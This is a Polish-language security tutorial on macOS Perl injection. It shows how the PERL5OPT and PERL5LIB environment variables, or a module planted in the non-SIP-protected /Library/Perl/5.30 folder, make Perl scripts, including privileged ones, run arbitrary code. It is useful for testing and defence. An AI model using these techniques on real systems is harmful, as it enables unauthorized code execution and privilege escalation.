macOS Perl Applications Injection

Przez zmienną środowiskową PERL5OPT i PERL5LIB

Korzystając z zmiennej środowiskowej PERL5OPT, można sprawić, że perl będzie wykonywał dowolne polecenia. Na przykład, stwórz ten skrypt:

#!/usr/bin/perl
print "Hello from the Perl script!\n";

Teraz wyeksportuj zmienną środowiskową i wykonaj skrypt perl:

export PERL5OPT='-Mwarnings;system("whoami")'
perl test.pl # This will execute "whoami"

Kolejną opcją jest utworzenie modułu Perl (np. /tmp/pmod.pm):

#!/usr/bin/perl
package pmod;
system('whoami');
1; # Modules must return a true value

Następnie użyj zmiennych środowiskowych:

PERL5LIB=/tmp/ PERL5OPT=-Mpmod

Poprzez zależności

Możliwe jest wyświetlenie kolejności folderów zależności Perl:

perl -e 'print join("\n", @INC)'

Który zwróci coś w stylu:

/Library/Perl/5.30/darwin-thread-multi-2level
/Library/Perl/5.30
/Network/Library/Perl/5.30/darwin-thread-multi-2level
/Network/Library/Perl/5.30
/Library/Perl/Updates/5.30.3
/System/Library/Perl/5.30/darwin-thread-multi-2level
/System/Library/Perl/5.30
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
/System/Library/Perl/Extras/5.30

Niektóre z zwróconych folderów nawet nie istnieją, jednak /Library/Perl/5.30 istnieje, nie jest chroniony przez SIP i znajduje się przed folderami chronionymi przez SIP. Dlatego ktoś mógłby nadużyć tego folderu, aby dodać zależności skryptu, dzięki czemu skrypt Perl o wysokich uprawnieniach go załaduje.

Na przykład, jeśli skrypt importuje use File::Basename;, byłoby możliwe utworzenie /Library/Perl/5.30/File/Basename.pm, aby wykonać arbitralny kod.

Referencje

• https://www.youtube.com/watch?v=zxZesAN-TEk